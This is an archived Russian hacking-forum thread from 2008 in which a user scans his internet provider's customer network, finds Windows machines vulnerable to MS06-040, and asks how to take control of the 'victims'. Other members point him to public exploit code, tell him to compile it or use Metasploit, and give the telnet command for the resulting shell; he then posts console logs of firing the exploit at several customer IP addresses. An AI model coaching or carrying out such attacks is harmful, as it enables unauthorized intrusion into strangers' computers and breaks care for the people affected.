PDA

Просмотр полной версии : Удаленное выполнение команд (ms06-040)


Ru}{eeZ
25.08.2008, 22:38
Решил просканировать сеть своего провайдера (Domolink) и нашёл одну уязвимость у большого количества пользователей, уязвимость ms06-040.
Сканирую я программой XSpider. Прошу вас объяснить как с помощью этой уязвимости можно получить доступ к компьютеру жертвы, зарание большое спасибо и плбсы с меня :) .

````````````````````````````````````
Краткое описание:
Уязвимости позволяют удаленному атакующему выполнить произвольный код с системными привилегиями.
Подробное описание:
В службе Server присутствует уязвимость переполнения буфера. Удаленный атакующий с помощью специальным образом сформированного запроса может вызвать отказ в обслуживании или выполнить произвольный код с системными привилегиями и получить полный контроль над системой.
Уязвимые версии:
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
````````````````````````````````````

remb0
25.08.2008, 22:50
Этот вопрос обсуждался здесь (http://forum.xakep.ru/m_1059100/tm.htm)

Ru}{eeZ
25.08.2008, 22:57
Этот вопрос обсуждался здесь (http://forum.xakep.ru/m_1059100/tm.htm)

Спасибо большое! :)

Ru}{eeZ
25.08.2008, 23:03
А там юзверь скинул ссылку на страницу http://www.securitylab.ru/poc/extra/271817.php , что делать с кодом, то там написан?)

SVAROG
25.08.2008, 23:22
на милворме пробывал искать?
http://milw0rm.com/exploits/2265

BuG_4F
25.08.2008, 23:23
Хм ... А в каком регионе ты живеш ? Уязвимость есть во всех сетях домолинк ?

ртуть
25.08.2008, 23:23
это РоС код, т.е. показательное эксплуатирование )))
запускаешь через metasploit =)

PS Хня на постном масле :Р

Ru}{eeZ
25.08.2008, 23:30
Хм ... А в каком регионе ты живеш ? Уязвимость есть во всех сетях домолинк ?

Да я просто пробил по маске своего провайдера, других смотреть не тянуло, там мне кажется, что ничего от провайдера не зависит, всего на 4х компах пока нашёл)

Ru}{eeZ
25.08.2008, 23:33
на милворме пробывал искать?
http://milw0rm.com/exploits/2265

Да, спасибо, но я не понимаю что с этим текстом делать) точнее по объяснению ртуть нужно пропустить текст через некий metasploit, это программа такая?

geezer.code
26.08.2008, 00:13
Да, спасибо, но я не понимаю что с этим текстом делать)
Деточка. это код с++ и сначала ЭТО надо скомпилировать. а уже потом пользовать так как написано в описании.

Ru}{eeZ
26.08.2008, 00:40
теперь понял, спс))

Ru}{eeZ
26.08.2008, 21:22
Народ, подскажите, вот кажется ломанул я комп, пишет:
F:\>2.exe 10.130.140.51 2
[+] Connecting to 10.130.140.51 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.140.51:4444 !

что дальше то?
почему-то опять отображается мой диск для ввода(F)!, а ведь как я понимаю должен его (C) (как я понимаю по стандарту)?

remb0
26.08.2008, 21:33
пиши так telnet 10.130.140.51 4444

gisTy
26.08.2008, 23:10
не надо было человеку про метасплойт рассказывать..;)

Ru}{eeZ
26.08.2008, 23:36
не надо было человеку про метасплойт рассказывать..;)

Так я без него всё скомпилировал и настроил (благодаря SVAROG и remb0 :) )

Ru}{eeZ
26.08.2008, 23:56
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

F:\Documents and Settings\Илья>св \
"св" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.

F:\Documents and Settings\Илья>cd \

F:\>2.exe 10.130.145.7 2
[+] Connecting to 10.130.145.7 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.7:4444 !

F:\>telnet 10.130.145.7
Подключение к 10.130.145.7...Не удалось открыть подключение к этому узлу, на пор
т 23: Сбой подключения

F:\>telnet 10.130.145.7 4444
Подключение к 10.130.145.7...Не удалось открыть подключение к этому узлу, на пор
т 4444: Сбой подключения

F:\>ping 10.130.145.7

Обмен пакетами с 10.130.145.7 по 32 байт:

Ответ от 10.130.145.7: число байт=32 время=61мс TTL=127
Ответ от 10.130.145.7: число байт=32 время=61мс TTL=127
Ответ от 10.130.145.7: число байт=32 время=60мс TTL=127
Ответ от 10.130.145.7: число байт=32 время=58мс TTL=127

Статистика Ping для 10.130.145.7:
Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
Минимальное = 58мсек, Максимальное = 61 мсек, Среднее = 60 мсек

F:\>2.exe 10.130.145.8 2
[+] Connecting to 10.130.145.8 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.8:4444 !

F:\>telnet 10.130.145.8 4444
Подключение к 10.130.145.8...Не удалось открыть подключение к этому узлу, на пор
т 4444: Сбой подключения

F:\>2.exe 10.130.145.13 2
[+] Connecting to 10.130.145.13 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.13:4444 !

F:\>telnet 10.130.145.13 4444
Подключение к 10.130.145.13...Не удалось открыть подключение к этому узлу, на по
рт 4444: Сбой подключения

F:\>telnet 10.130.145.13:4444
Подключение к 10.130.145.13:4444...Не удалось открыть подключение к этому узлу,
на порт 23: Сбой подключения

F:\>2.exe 10.130.145.39 2
[+] Connecting to 10.130.145.39 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.39:4444 !

F:\>telnet 10.130.145.39 4444
Подключение к 10.130.145.39...Не удалось открыть подключение к этому узлу, на по
рт 4444: Сбой подключения

F:\>2.exe 10.130.145.51 2
[+] Connecting to 10.130.145.51 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.51:4444 !

F:\>telnet 10.130.145.51 4444
Подключение к 10.130.145.51...Не удалось открыть подключение к этому узлу, на по
рт 4444: Сбой подключения

F:\>2.exe 10.130.145.58 2
[+] Connecting to 10.130.145.58 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.58:4444 !

F:\>telnet 10.130.145.58 4444
Подключение к 10.130.145.58...Не удалось открыть подключение к этому узлу, на по
рт 4444: Сбой подключения

F:\>








``````````````````````
Видимо уже не прёт эта бага... кто-как считает?

Ru}{eeZ
27.08.2008, 14:21
Народ, так в чём проблема? Подскажите плиз! Может фаер? Или ещё что???

DeBugger
27.08.2008, 14:27
А он вообще срабатывает? Или в любом случае пишет "Now check for shell on 4444 !"?

Ru}{eeZ
27.08.2008, 16:45
Срабатывает, я проверял, и пишет это только на дырявых компах :(

SVAROG
27.08.2008, 16:58
заюзай метасплоит там легче будет http://www.metasploit.com/framework/downloader/?id=framework-3.0.exe

Ru}{eeZ
27.08.2008, 17:02
У меня стоит 3.1, только я с ним не разбирался, да и вообще почему-то ничего из него не запускается(

Ru}{eeZ
27.08.2008, 22:31
Такая распространённая дырка в сети, жаль, что никто не знает как через неё законектиться...жали, жаль...

gisTy
27.08.2008, 22:46
а ты не думал, что в сплойте может стоять защита от детей?

Ru}{eeZ
28.08.2008, 01:31
а ты не думал, что в сплойте может стоять защита от детей?
Как я вижу у тебя не получается его заюзать?